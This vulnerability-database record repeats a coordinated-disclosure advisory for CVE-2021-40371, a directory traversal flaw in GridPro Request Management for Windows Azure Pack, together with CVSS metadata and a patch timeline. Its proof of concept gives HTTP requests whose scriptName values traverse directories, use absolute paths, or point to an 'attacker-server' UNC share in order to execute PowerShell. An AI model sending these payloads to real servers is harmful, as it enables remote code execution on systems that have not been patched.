GridPro Request Management for Windows Azure Pack versions 2.0.7905 and below suffer from a traversal vulnerability that can allow for arbitrary execution of Powershell scripts.
{"id": "1337DAY-ID-36951", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal Vulnerability", "description": "GridPro Request Management for Windows Azure Pack versions 2.0.7905 and below suffer from a traversal vulnerability that can allow for arbitrary execution of Powershell scripts.", "published": "2021-10-26T00:00:00", "modified": "2021-10-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36951", "reporter": "Giulian Guran", "references": [], "cvelist": ["CVE-2021-40371"], "immutableFields": [], "lastseen": "2021-12-04T15:48:55", "viewCount": 150, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0870"]}, {"type": "cve", "idList": ["CVE-2021-40371"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164621"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0870"]}, {"type": "cve", "idList": ["CVE-2021-40371"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164621"]}]}, "exploitation": null, "vulnersScore": 5.3}, "sourceHref": "https://0day.today/exploit/36951", "sourceData": "~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~\n PRODUCT : GridPro Request Management for Windows Azure Pack\n VENDOR : GridPro Software\n SEVERITY : Critical\n AFFECTED VERSION : <=2.0.7905\n IDENTIFIERS : CVE-2021-40371\n PATCH VERSION : 2.0.7912\n FOUND BY : Giulian Guran, Certitude Lab\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nIntroduction\n------------\n\n\"Windows Azure Pack delivers cloud capabilities to \\[...\\] on-premise\ndatacenter\\[s\\]. \\[GridPro Request Management for Azure Pack\\] add\\[s\\]\nbusiness processes, custom services, and customer support by integrating\nMicrosoft System Center Service Manager(TM) with Windows Azure Pack in a\nunified cloud platform.\"\n\nSource: https://www.gridprosoftware.com/products/requestmanagement/\n\nVulnerability Overview\n----------------------\n\nGridPro Request Management for Windows Azure Pack provides the ability to\nexecute PowerShell scripts. Through specific JSON parameters in HTTP requests\nthe plugin takes relative path locations as input to execute the desired\nPowerShell scripts on the server. Through multiple techniques however, it is\npossible to reach PowerShell scripts in other directories that may not be\nintended to be executed by the application and can therefore lead to remote\ncode execution.\n\n1. Through directory traversal attacks (e.g. usage of one or more `..\\`) it\n is possible to reach parent directories outside the original web directory\n and execute arbitrary local scripts the web server account has access to.\n2. Through fully qualified path names (e.g. `C:\\Temp\\script.ps1`) it is\n possible to execute arbitrary local scripts the web server account has\n access to, when the full path to the script is known.\n3. By using UNC paths (e.g. `\\\\attacker-server\\share$\\script.ps1`) it is\n possible to execute arbitrary PowerShell scripts from attacker-controlled\n remote network shares.\n\nProof of Concept\n----------------\n\nTypical HTTP requests that execute PowerShell scripts on the server may look\nas follows. It is important to note that adding a second backslash is\nnecessary to properly escape the backslash character:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"Directory1\\\\Directory2\\\\OriginalScript.ps1\",[...]\n\nBy default, this relative path lies under the configured web server directory.\nThe possible attack types to gain access to PowerShell scripts in other\ndirectories or shares are described in the following sections.\n\n### 1. Directory Traversal\n\nUsing a directory traversal, it is possible to e.g. execute a local script\n`C:\\Temp\\script.ps1`:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Temp\\\\script.ps1\",[...]\n\nAn attacker can exploit this by writing or uploading arbitrary PowerShell\nscripts to the server and guessing their storage location to gain remote code\nexecution or by abusing existing PowerShell scripts on the server.\n\n### 2. Direct Access Using The Fully Qualified Path Name\n\nUsing the fully qualified path name, it is again possible to e.g. execute the\nlocal script `C:\\Temp\\script.ps1`:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"C:\\\\Temp\\\\script.ps1\",[...]\n\nAn attacker can exploit this by writing or uploading arbitrary PowerShell\nscripts to the server and knowing their exact storage location to gain remote\ncode execution or by abusing existing PowerShell scripts on the server.\n\n### 3. Execution Of Attacker-Controlled Scripts From Network Shares\n\nUsing UNC paths, it is possible to e.g. execute arbitrary scripts from\nattacker-controlled network shares:\n\n POST /ServiceManagerTenant/GetVisibilityMap HTTP/2\n Host: [vulnerableHost]\n [...]\n Connection: close\n\n {\"scriptName\":\"\\\\\\\\attacker-server\\\\share$\\\\script.ps1\",[...]\n\nAn attacker can exploit this by preparing arbitrary PowerShell scripts on an\nattacker-controlled network share and get them executed on the target server\nto gain remote code execution.\n\nResolution\n----------\n\nGridPro fixed this vulnerability in GridPro Request Management for Windows\nAzure Pack version 2.0.7912 and later.\n\nTimeline\n--------\n\n ---------------------------------------------------------------------------\n Date Text\n ------------ --------------------------------------------------------------\n 2021-08-04 Sending vulnerability description and proof of concept to the\n vendor\n\n 2021-08-17 GridPro team confirms issue being reproduced, fixed and\n validated on their side\n\n 2021-08-18 GridPro team confirms a customer having installed the fix\n\n 2021-08-19 Coordination with vendor\n\n 2021-08-20 Coordination with vendor\n\n 2021-08-25 Coordination with vendor\n\n 2021-08-31 Coordination with vendor\n\n 2021-09-06 Vendor releases patch\n\n 2021-10-19 Coordination with vendor\n\n 2021-10-20 Public release of the advisory\n ---------------------------------------------------------------------------\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1646364059}}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:08", "description": "A remote code execution vulnerability exists in Gridpro Request Management. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-28T00:00:00", "type": "checkpoint_advisories", "title": "Gridpro Request Management Remote Code Execution (CVE-2021-40371)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40371"], "modified": "2021-11-28T00:00:00", "id": "CPAI-2021-0870", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-10-25T17:34:14", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40371"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164621", "href": "https://packetstormsecurity.com/files/164621/GridPro-Request-Management-For-Windows-Azure-Pack-2.0.7905-Directory-Traversal.html", "sourceData": "`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n~ Certitude Securtiy Advisory - CSA-2021-003 ~ \n~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ \nPRODUCT : GridPro Request Management for Windows Azure Pack \nVENDOR : GridPro Software \nSEVERITY : Critical \nAFFECTED VERSION : <=2.0.7905 \nIDENTIFIERS : CVE-2021-40371 \nPATCH VERSION : 2.0.7912 \nFOUND BY : Giulian Guran, Certitude Lab \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nIntroduction \n------------ \n \n\"Windows Azure Pack delivers cloud capabilities to \\[...\\] on-premise \ndatacenter\\[s\\]. \\[GridPro Request Management for Azure Pack\\] add\\[s\\] \nbusiness processes, custom services, and customer support by integrating \nMicrosoft System Center Service Manager(TM) with Windows Azure Pack in a \nunified cloud platform.\" \n \nSource: https://www.gridprosoftware.com/products/requestmanagement/ \n \nVulnerability Overview \n---------------------- \n \nGridPro Request Management for Windows Azure Pack provides the ability to \nexecute PowerShell scripts. Through specific JSON parameters in HTTP requests \nthe plugin takes relative path locations as input to execute the desired \nPowerShell scripts on the server. Through multiple techniques however, it is \npossible to reach PowerShell scripts in other directories that may not be \nintended to be executed by the application and can therefore lead to remote \ncode execution. \n \n1. Through directory traversal attacks (e.g. usage of one or more `..\\`) it \nis possible to reach parent directories outside the original web directory \nand execute arbitrary local scripts the web server account has access to. \n2. Through fully qualified path names (e.g. `C:\\Temp\\script.ps1`) it is \npossible to execute arbitrary local scripts the web server account has \naccess to, when the full path to the script is known. \n3. By using UNC paths (e.g. `\\\\attacker-server\\share$\\script.ps1`) it is \npossible to execute arbitrary PowerShell scripts from attacker-controlled \nremote network shares. \n \nProof of Concept \n---------------- \n \nTypical HTTP requests that execute PowerShell scripts on the server may look \nas follows. It is important to note that adding a second backslash is \nnecessary to properly escape the backslash character: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"Directory1\\\\Directory2\\\\OriginalScript.ps1\",[...] \n \nBy default, this relative path lies under the configured web server directory. \nThe possible attack types to gain access to PowerShell scripts in other \ndirectories or shares are described in the following sections. \n \n### 1. Directory Traversal \n \nUsing a directory traversal, it is possible to e.g. execute a local script \n`C:\\Temp\\script.ps1`: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Temp\\\\script.ps1\",[...] \n \nAn attacker can exploit this by writing or uploading arbitrary PowerShell \nscripts to the server and guessing their storage location to gain remote code \nexecution or by abusing existing PowerShell scripts on the server. \n \n### 2. Direct Access Using The Fully Qualified Path Name \n \nUsing the fully qualified path name, it is again possible to e.g. execute the \nlocal script `C:\\Temp\\script.ps1`: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"C:\\\\Temp\\\\script.ps1\",[...] \n \nAn attacker can exploit this by writing or uploading arbitrary PowerShell \nscripts to the server and knowing their exact storage location to gain remote \ncode execution or by abusing existing PowerShell scripts on the server. \n \n### 3. Execution Of Attacker-Controlled Scripts From Network Shares \n \nUsing UNC paths, it is possible to e.g. execute arbitrary scripts from \nattacker-controlled network shares: \n \nPOST /ServiceManagerTenant/GetVisibilityMap HTTP/2 \nHost: [vulnerableHost] \n[...] \nConnection: close \n \n{\"scriptName\":\"\\\\\\\\attacker-server\\\\share$\\\\script.ps1\",[...] \n \nAn attacker can exploit this by preparing arbitrary PowerShell scripts on an \nattacker-controlled network share and get them executed on the target server \nto gain remote code execution. \n \nResolution \n---------- \n \nGridPro fixed this vulnerability in GridPro Request Management for Windows \nAzure Pack version 2.0.7912 and later. \n \nTimeline \n-------- \n \n--------------------------------------------------------------------------- \nDate Text \n------------ -------------------------------------------------------------- \n2021-08-04 Sending vulnerability description and proof of concept to the \nvendor \n \n2021-08-17 GridPro team confirms issue being reproduced, fixed and \nvalidated on their side \n \n2021-08-18 GridPro team confirms a customer having installed the fix \n \n2021-08-19 Coordination with vendor \n \n2021-08-20 Coordination with vendor \n \n2021-08-25 Coordination with vendor \n \n2021-08-31 Coordination with vendor \n \n2021-09-06 Vendor releases patch \n \n2021-10-19 Coordination with vendor \n \n2021-10-20 Public release of the advisory \n--------------------------------------------------------------------------- \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n(c) 2021 Certitude Consulting GmbH \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164621/CSA-2021-003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T19:08:34", "description": "Gridpro Request Management for Windows Azure Pack before 2.0.7912 allows Directory Traversal for remote code execution, as demonstrated by ..\\\\ in a scriptName JSON value to ServiceManagerTenant/GetVisibilityMap.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T07:15:00", "type": "cve", "title": "CVE-2021-40371", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40371"], "modified": "2021-10-28T22:18:00", "cpe": [], "id": "CVE-2021-40371", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40371", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}
GridPro Request Management For Windows Azure Pack 2.0.7905 Directory Traversal Vulnerability
